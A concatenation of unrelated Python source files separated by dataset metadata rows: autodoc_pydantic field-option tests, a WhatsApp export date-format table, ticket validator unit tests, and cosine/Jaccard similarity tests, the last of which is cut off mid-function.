# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_doc_policy": "docstring"},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-doc-policy": "docstring"},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_doc_policy": "both"},
options_doc={"field-doc-policy": "docstring"},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_doc_policy_description(autodocument):
kwargs = dict(object_path='target.configuration.FieldDocPolicy.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldDocPolicy.field',
' :module: target.configuration',
' :type: int',
'',
' Custom Desc.',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_doc_policy": "description"},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-doc-policy": "description"},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_doc_policy": "both"},
options_doc={"field-doc-policy": "description"},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_doc_policy_both(autodocument):
kwargs = dict(object_path='target.configuration.FieldDocPolicy.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldDocPolicy.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
'',
' Custom Desc.',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_doc_policy": "both"},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-doc-policy": "both"},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_doc_policy": "docstring"},
options_doc={"field-doc-policy": "both"},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_constraints_true(autodocument):
kwargs = dict(
object_path='target.configuration.FieldShowConstraints.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldShowConstraints.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
'',
' :Constraints:',
' - **minimum** = 0',
' - **maximum** = 100',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_constraints": True},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-show-constraints": True},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_constraints": False},
options_doc={"field-show-constraints": True},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_constraints_false(autodocument):
kwargs = dict(
object_path='target.configuration.FieldShowConstraints.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldShowConstraints.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_constraints": False},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-show-constraints": False},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_constraints": True},
options_doc={"field-show-constraints": False},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_alias_true(autodocument):
kwargs = dict(
object_path='target.configuration.FieldShowAlias.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldShowAlias.field',
' :module: target.configuration',
' :type: int',
' :alias: field2',
'',
' Field.',
'',
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_alias": True},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-show-alias": True},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_alias": False},
options_doc={"field-show-alias": True},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_alias_false(autodocument):
kwargs = dict(
object_path='target.configuration.FieldShowAlias.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldShowAlias.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
'',
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_alias": False},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-show-alias": False},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_alias": True},
options_doc={"field-show-alias": False},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_alias_true_directive(parse_rst):
"""Tests pydantic_validator directive.
"""
default_value = desc_annotation_default_value("1")
prefix = desc_annotation_directive_prefix("field")
output_nodes = (
index,
[desc, ([desc_signature, ([desc_annotation, prefix],
[desc_addname, "FieldShowAlias."],
[desc_name, "field"],
default_value,
[desc_annotation, " (alias 'field2')"])],
[desc_content, ()])
]
)
# explicit local
input_rst = [
'',
'.. py:pydantic_field:: FieldShowAlias.field',
' :module: target.configuration',
' :value: 1',
' :alias: field2',
''
]
doctree = parse_rst(input_rst)
assert_node(doctree, output_nodes)
# explicit local overwrite explict global
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_show_alias": False})
assert_node(doctree, output_nodes)
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_show_alias": True})
assert_node(doctree, output_nodes)
def test_autodoc_pydantic_field_show_alias_false_directive(parse_rst):
"""Tests pydantic_validator directive.
"""
default_value = desc_annotation_default_value("1")
prefix = desc_annotation_directive_prefix("field")
output_nodes = (
index,
[desc, ([desc_signature, ([desc_annotation, prefix],
[desc_addname, "FieldShowAlias."],
[desc_name, "field"],
default_value)],
[desc_content, ()])
]
)
# explicit local
input_rst = [
'',
'.. py:pydantic_field:: FieldShowAlias.field',
' :module: target.configuration',
' :value: 1',
''
]
doctree = parse_rst(input_rst)
assert_node(doctree, output_nodes)
# explicit local overwrite explict global
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_show_alias": True})
assert_node(doctree, output_nodes)
# explicit global
input_rst = [
'',
'.. py:pydantic_field:: FieldShowAlias.field',
' :module: target.configuration',
' :value: 1',
''
]
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_show_alias": True})
assert_node(doctree, output_nodes)
def test_autodoc_pydantic_field_show_default_true(autodocument):
kwargs = dict(
object_path='target.configuration.FieldShowDefault.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldShowDefault.field',
' :module: target.configuration',
' :type: int',
' :value: 1',
'',
' Field.',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_default": True},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-show-default": True},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_default": False},
options_doc={"field-show-default": True},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_default_false(autodocument):
kwargs = dict(
object_path='target.configuration.FieldShowDefault.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldShowDefault.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_default": False},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-show-default": False},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_default": True},
options_doc={"field-show-default": False},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_signature_prefix(autodocument):
kwargs = dict(
object_path='target.configuration.FieldSignaturePrefix.field',
**KWARGS)
# default
result = [
'',
".. py:pydantic_field:: FieldSignaturePrefix.field",
' :module: target.configuration',
' :type: int',
'',
' Field.',
''
]
actual = autodocument(**kwargs)
assert result == actual
# explicit value
result = [
'',
".. py:pydantic_field:: FieldSignaturePrefix.field",
' :module: target.configuration',
' :type: int',
' :field-signature-prefix: foobar',
'',
' Field.',
''
]
actual = autodocument(
options_doc={"field-signature-prefix": "foobar"},
**kwargs)
assert result == actual
# explict empty
result = [
'',
".. py:pydantic_field:: FieldSignaturePrefix.field",
' :module: target.configuration',
' :type: int',
' :field-signature-prefix: ',
'',
' Field.',
''
]
actual = autodocument(
options_doc={"field-signature-prefix": ""},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_signature_prefix_directive(parse_rst):
# default
input_rst = [
'',
".. py:pydantic_field:: FieldSignaturePrefix.field",
' :module: target.configuration',
'',
' Field.',
''
]
doctree = parse_rst(input_rst)
prefix = desc_annotation_directive_prefix("field")
assert_node(doctree[1][0][0], [desc_annotation, prefix])
# empty
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_signature_prefix": ""})
prefix = desc_annotation_directive_prefix("attribute")
assert_node(doctree[1][0][0], [desc_annotation, prefix])
# custom
input_rst = [
'',
".. py:pydantic_field:: FieldSignaturePrefix.field",
' :module: target.configuration',
' :field-signature-prefix: foobar',
'',
' Field.',
''
]
doctree = parse_rst(input_rst)
prefix = desc_annotation_directive_prefix("foobar")
assert_node(doctree[1][0][0], [desc_annotation, prefix])
@pytest.mark.parametrize("field", ["field1", "field2", "field3"])
def test_autodoc_pydantic_field_show_required_true(field, autodocument):
result = [
f'',
f'.. py:pydantic_field:: FieldShowRequired.{field}',
' :module: target.configuration',
' :type: int',
' :required:',
f'',
f' {field}',
f'',
]
kwargs = dict(
object_path=f'target.configuration.FieldShowRequired.{field}',
**KWARGS
)
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_required": True},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(options_doc={"field-show-required": True}, **kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_required": False},
options_doc={"field-show-required": True},
**kwargs)
assert result == actual
@pytest.mark.parametrize("field", ["field1", "field2", "field3"])
def test_autodoc_pydantic_field_show_required_false(field, autodocument):
result = [
'',
f'.. py:pydantic_field:: FieldShowRequired.{field}',
' :module: target.configuration',
' :type: int',
'',
f' {field}',
'',
]
kwargs = dict(
object_path=f'target.configuration.FieldShowRequired.{field}',
**KWARGS
)
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_required": False},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(options_doc={"field-show-required": False}, **kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_required": True},
options_doc={"field-show-required": False},
**kwargs)
assert result == actual
@pytest.mark.parametrize(["field", "value"],
[("field1", "PydanticUndefined"),
("field2", "Ellipsis"),
("field3", "Ellipsis")])
def test_autodoc_pydantic_field_show_required_false_show_default_true(
field, value, autodocument):
if pydantic.VERSION < "1.8":
value = "Ellipsis"
result = [
'',
f'.. py:pydantic_field:: FieldShowRequired.{field}',
' :module: target.configuration',
' :type: int',
f' :value: {value}',
'',
f' {field}',
'',
]
kwargs = dict(
object_path=f'target.configuration.FieldShowRequired.{field}',
**KWARGS
)
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_required": False,
"autodoc_pydantic_field_show_default": True},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(options_doc={"field-show-required": False,
"field-show-default": True},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_show_required": True,
"autodoc_pydantic_field_show_default": False},
options_doc={"field-show-required": False,
"field-show-default": True},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_show_required_true_directive(parse_rst):
"""Tests pydantic_validator directive.
"""
prefix = desc_annotation_directive_prefix("field")
output_nodes = (
index,
[desc, ([desc_signature, ([desc_annotation, prefix],
[desc_addname, "FieldShowRequired."],
[desc_name, "field"],
[desc_annotation, " [Required]"],
[desc_annotation, " (alias 'field2')"])],
[desc_content, ()])
]
)
# explicit local
input_rst = [
'',
'.. py:pydantic_field:: FieldShowRequired.field',
' :module: target.configuration',
' :required:',
' :alias: field2',
''
]
doctree = parse_rst(input_rst)
assert_node(doctree, output_nodes)
# explicit local overwrite explict global
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_show_required": False})
assert_node(doctree, output_nodes)
def test_autodoc_pydantic_field_show_required_false_directive(parse_rst):
"""Tests pydantic_validator directive.
"""
prefix = desc_annotation_directive_prefix("field")
output_nodes = (
index,
[desc, ([desc_signature, ([desc_annotation, prefix],
[desc_addname, "FieldShowRequired."],
[desc_name, "field"],
[desc_annotation, " (alias 'field2')"])],
[desc_content, ()])
]
)
# explicit local
input_rst = [
'',
'.. py:pydantic_field:: FieldShowRequired.field',
' :module: target.configuration',
' :alias: field2',
''
]
doctree = parse_rst(input_rst)
assert_node(doctree, output_nodes)
# explicit local overwrite explict global
doctree = parse_rst(input_rst,
conf={"autodoc_pydantic_field_show_required": True})
assert_node(doctree, output_nodes)
| 27.616561 | 83 | 0.586236 | 1,951 | 21,679 | 6.251666 | 0.055869 | 0.086333 | 0.093466 | 0.088546 | 0.926703 | 0.917357 | 0.908584 | 0.898746 | 0.878085 | 0.864393 | 0 | 0.00242 | 0.294848 | 21,679 | 784 | 84 | 27.651786 | 0.795447 | 0.064394 | 0 | 0.810997 | 0 | 0 | 0.280806 | 0.133819 | 0 | 0 | 0 | 0 | 0.101375 | 1 | 0.034364 | false | 0 | 0.010309 | 0 | 0.044674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
580ff46a38f8474d326ab3b65d497aea4e9c3361 | 841 | py | Python | whatsapptojson/constants.py | ankschoubey/Whatsapp-Text-To-Json-Converter | 7082793bbe010229b3bd0d4db03e515517fffd35 | [
"MIT"
] | 3 | 2018-12-28T15:52:45.000Z | 2020-03-15T11:48:05.000Z | whatsapptojson/constants.py | ankschoubey/Whatsapp-Text-To-Json-Converter | 7082793bbe010229b3bd0d4db03e515517fffd35 | [
"MIT"
] | null | null | null | whatsapptojson/constants.py | ankschoubey/Whatsapp-Text-To-Json-Converter | 7082793bbe010229b3bd0d4db03e515517fffd35 | [
"MIT"
] | 2 | 2019-12-06T03:35:04.000Z | 2021-12-11T15:12:46.000Z | devices = {
'iphone': {
'date_format': '%d/%m/%y %I:%M:%S %p',
'delimeter_format': ']|: ',
'attachment_tag': '<\u200eattached>',
'attachment_delimeters': ' • | <\u200eattached>'
},
'android': {
'date_format': '%m/%d/%y %I:%M %p',
'delimeter_format': ' - |: ',
'attachment_tag': '(file attached)',
'attachment_delimeters': '\(file attached\)'
},
'iphone_24': {
'date_format': '%d/%m/%y %H:%M:%S',
'delimeter_format': ']|: ',
'attachment_tag': '<\u200eattached>',
'attachment_delimeters': ' • | <\u200eattached>'
},
'android_24': {
'date_format': '%m/%d/%y %H:%M',
'delimeter_format': ' - |: ',
'attachment_tag': '(file attached)',
'attachment_delimeters': '\(file attached\)'
}
}
| 31.148148 | 57 | 0.488704 | 79 | 841 | 5.025316 | 0.278481 | 0.100756 | 0.251889 | 0.282116 | 0.916877 | 0.780856 | 0.780856 | 0.780856 | 0.780856 | 0.780856 | 0 | 0.026273 | 0.275862 | 841 | 26 | 58 | 32.346154 | 0.619048 | 0 | 0 | 0.461538 | 0 | 0 | 0.604043 | 0.099881 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5815b3fff070092418e051a962425b1bb057e6ba | 3,107 | py | Python | tests/unittests/test_validator.py | cooomma/mayday-ticketing-bot | 77377c19d9741e30416951e5d2364bbb66d762ad | [
"MIT"
] | 4 | 2019-08-17T05:21:37.000Z | 2019-08-30T03:24:32.000Z | tests/unittests/test_validator.py | cooomma/mayday-ticketing-bot | 77377c19d9741e30416951e5d2364bbb66d762ad | [
"MIT"
] | 1 | 2021-04-30T20:45:10.000Z | 2021-04-30T20:45:10.000Z | tests/unittests/test_validator.py | cooomma/mayday-ticketing-bot | 77377c19d9741e30416951e5d2364bbb66d762ad | [
"MIT"
] | 3 | 2019-03-03T16:40:25.000Z | 2019-08-17T08:01:19.000Z | import unittest
from mayday.helpers.item_validator import ItemValidator
from mayday.objects.ticket import Ticket
USERNAME = 'Mayday'
USER_ID = 123456789
class Test(unittest.TestCase):
def test_validator_success(self):
ticket = Ticket(username=USERNAME, user_id=USER_ID)
ticket.category = 1
ticket.date = 508
ticket.price_id = 1
ticket.quantity = 2
ticket.status = 1
result = ticket.validate()
assert result['status']
validator = ItemValidator(ticket.to_dict())
result = validator.check_ticket()
assert result['status']
def test_validator_missing_category(self):
ticket = Ticket(username=USERNAME, user_id=USER_ID)
ticket.date = 508
ticket.price_id = 1
ticket.quantity = 2
ticket.status = 1
result = ticket.validate()
assert result['status'] is False
assert result['info'] == '門票類別未填喔'
validator = ItemValidator(ticket.to_dict())
result = validator.check_ticket()
assert result['status'] is False
assert result['info'] == '門票類別未填喔'
def test_validator_missing_date(self):
ticket = Ticket(username=USERNAME, user_id=USER_ID)
ticket.category = 1
ticket.price_id = 1
ticket.quantity = 2
ticket.status = 1
result = ticket.validate()
assert result['status'] is False
assert result['info'] == '日期未填喔'
validator = ItemValidator(ticket.to_dict())
result = validator.check_ticket()
assert result['status'] is False
assert result['info'] == '日期未填喔'
def test_validator_missing_price(self):
ticket = Ticket(username=USERNAME, user_id=USER_ID)
ticket.category = 1
ticket.date = 508
ticket.quantity = 2
ticket.status = 1
result = ticket.validate()
assert result['status'] is False
assert result['info'] == '價錢未填喔'
validator = ItemValidator(ticket.to_dict())
result = validator.check_ticket()
assert result['status'] is False
assert result['info'] == '價錢未填喔'
def test_validator_missing_quantity(self):
ticket = Ticket(username=USERNAME, user_id=USER_ID)
ticket.category = 1
ticket.date = 508
ticket.price_id = 1
ticket.status = 1
result = ticket.validate()
assert result['status'] is False
assert result['info'] == '數量未填喔'
validator = ItemValidator(ticket.to_dict())
result = validator.check_ticket()
assert result['status'] is False
assert result['info'] == '數量未填喔'
def test_validator_error_message(self):
ticket = Ticket(username=USERNAME, user_id=USER_ID)
expected = '門票類別未填喔\n日期未填喔\n價錢未填喔\n數量未填喔'
result = ticket.validate()
assert result['status'] is False
assert result['info'] == expected
validator = ItemValidator(ticket.to_dict())
result = validator.check_ticket()
assert result['status'] is False
assert result['info'] == expected
| 32.030928 | 59 | 0.625362 | 347 | 3,107 | 5.463977 | 0.138329 | 0.139241 | 0.113924 | 0.105485 | 0.813819 | 0.813819 | 0.813819 | 0.813819 | 0.813819 | 0.758966 | 0 | 0.016777 | 0.271001 | 3,107 | 96 | 60 | 32.364583 | 0.820309 | 0 | 0 | 0.8375 | 0 | 0 | 0.061152 | 0.009012 | 0 | 0 | 0 | 0 | 0.275 | 1 | 0.075 | false | 0 | 0.0375 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5818f9a33c0b3ce6185f09d15378acd71b81341a | 23,327 | py | Python | Base/Similarity/cosine_similarity_test.py | marcomussi/RecommenderSystemPolimi | ce45b1eee2231abe1a844697648e94b98dadabea | [
"MIT"
] | null | null | null | Base/Similarity/cosine_similarity_test.py | marcomussi/RecommenderSystemPolimi | ce45b1eee2231abe1a844697648e94b98dadabea | [
"MIT"
] | 12 | 2019-01-16T18:43:03.000Z | 2022-03-11T23:34:58.000Z | Base/Similarity/cosine_similarity_test.py | marcomussi/RecommenderSystemPolimi | ce45b1eee2231abe1a844697648e94b98dadabea | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 23/10/17
@author: Maurizio Ferrari Dacrema
"""
import unittest
from data.Movielens_10m.Movielens10MReader import Movielens10MReader
from Base.Recommender_utils import similarityMatrixTopK
import subprocess, os
import numpy as np
import time
import scipy.sparse as sps
def areSparseEquals(Sparse1, Sparse2):
if(Sparse1.shape != Sparse2.shape):
return False
return (Sparse1 - Sparse2).nnz ==0
class MyTestCase(unittest.TestCase):
def test_cosine_similarity_dense(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity_Python as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
TopK = 0
data_matrix = np.array([[1,1,0,1],[0,1,1,1],[1,0,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = False)
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Compute_Similarity_Python(data_matrix, topK=TopK, normalize = False)
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = False)
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.all(W_dense_Cython == W_dense_mul), "W_dense_Cython not matching control"
assert np.all(W_dense_Python == W_dense_mul), "W_dense_Python not matching control"
assert np.all(W_dense_Parallel == W_dense_mul), "W_dense_Parallel not matching control"
def test_cosine_similarity_dense_row_weighted(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity_Python as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
TopK = 0
data_matrix = np.array([[1,2,0,1],[0,1,4,1],[3,0,1,0]])
data_matrix = sps.csr_matrix(data_matrix, dtype=np.float)
row_weights = [2, 3, 0, 4]
cosine_similarity = Cosine_Similarity_Cython(data_matrix.T, topK=TopK, normalize = False, row_weights = row_weights)
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Compute_Similarity_Python(data_matrix.T, topK=TopK, normalize = False, row_weights = row_weights)
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix.T, topK=TopK, normalize = False, row_weights = row_weights)
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_mul = data_matrix.dot(sps.diags(row_weights)).dot(data_matrix.T).toarray()
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_dense_external_cfr(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity_Python as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
from sklearn.metrics.pairwise import cosine_similarity as Cosine_Similarity_Sklearn
from scipy.spatial.distance import jaccard as Jaccard_Distance_Scipy
TopK = 0
shrink = 0
data_matrix = np.array([[1,2,0,1],[0,1,4,1],[1,3,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = True, shrink=shrink)
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Compute_Similarity_Python(data_matrix, topK=TopK, normalize = True, shrink=shrink)
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = True, shrink=shrink)
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_sklearn = Cosine_Similarity_Sklearn(data_matrix.copy().T)
W_dense_sklearn[np.arange(W_dense_sklearn.shape[0]),np.arange(W_dense_sklearn.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_sklearn, atol=1e-4), "W_dense_Cython Cosine not matching Sklearn control"
assert np.allclose(W_dense_Python, W_dense_sklearn, atol=1e-4), "W_dense_Python Cosine not matching Sklearn control"
assert np.allclose(W_dense_Parallel, W_dense_sklearn, atol=1e-4), "W_dense_Parallel Cosine not matching Sklearn control"
data_matrix = np.array([[1,2,0,1],[0,1,4,1],[1,3,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = True, shrink=shrink,
mode='jaccard')
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Compute_Similarity_Python(data_matrix, topK=TopK, normalize = True, shrink=shrink,
mode='jaccard')
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = True, shrink=shrink,
mode='jaccard')
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_Scipy = np.zeros_like(W_dense_Python)
data_matrix.data = np.ones_like(data_matrix.data)
data_matrix = data_matrix.toarray()
for row in range(W_dense_Scipy.shape[0]):
for col in range(W_dense_Scipy.shape[1]):
if row != col:
W_dense_Scipy[row, col] = 1-Jaccard_Distance_Scipy(data_matrix[:,row], data_matrix[:,col])
assert np.allclose(W_dense_Cython, W_dense_Scipy, atol=1e-4), "W_dense_Cython Jaccard not matching Scipy control"
assert np.allclose(W_dense_Python, W_dense_Scipy, atol=1e-4), "W_dense_Python Jaccard not matching Scipy control"
assert np.allclose(W_dense_Parallel, W_dense_Scipy, atol=1e-4), "W_dense_Parallel Jaccard not matching Scipy control"
def test_cosine_similarity_dense_normalize(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
import numpy.matlib
TopK = 0
shrink = 5
data_matrix = np.array([[1,1,0,1],[0,1,1,1],[1,0,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = True, shrink=shrink)
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = True, shrink=shrink)
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = True, shrink=shrink)
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_denominator = np.matlib.repmat(data_matrix.power(2).sum(axis=0), data_matrix.shape[1], 1)
W_dense_denominator = np.sqrt(W_dense_denominator)
W_dense_denominator = np.multiply(W_dense_denominator, W_dense_denominator.T) + shrink
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul /= W_dense_denominator
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_dense_adjusted(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
import numpy.matlib
TopK = 0
shrink = 0
data_matrix = np.array([[1,2,0,1],[0,1,4,1],[1,3,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='adjusted')
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='adjusted')
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='adjusted')
W_dense_Parallel = cosine_similarity.compute_similarity()
data_matrix = data_matrix.toarray().astype(np.float64)
for row in range(data_matrix.shape[0]):
nonzeroMask = data_matrix[row,:]>0
data_matrix[row,:][nonzeroMask] -= np.mean(data_matrix[row,:][nonzeroMask])
W_dense_denominator = np.matlib.repmat((data_matrix**2).sum(axis=0), data_matrix.shape[1], 1)
W_dense_denominator = np.sqrt(W_dense_denominator)
W_dense_denominator = np.multiply(W_dense_denominator, W_dense_denominator.T) + shrink
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul[W_dense_denominator>0] /= W_dense_denominator[W_dense_denominator>0]
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_dense_pearson(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
import numpy.matlib
TopK = 0
shrink = 0
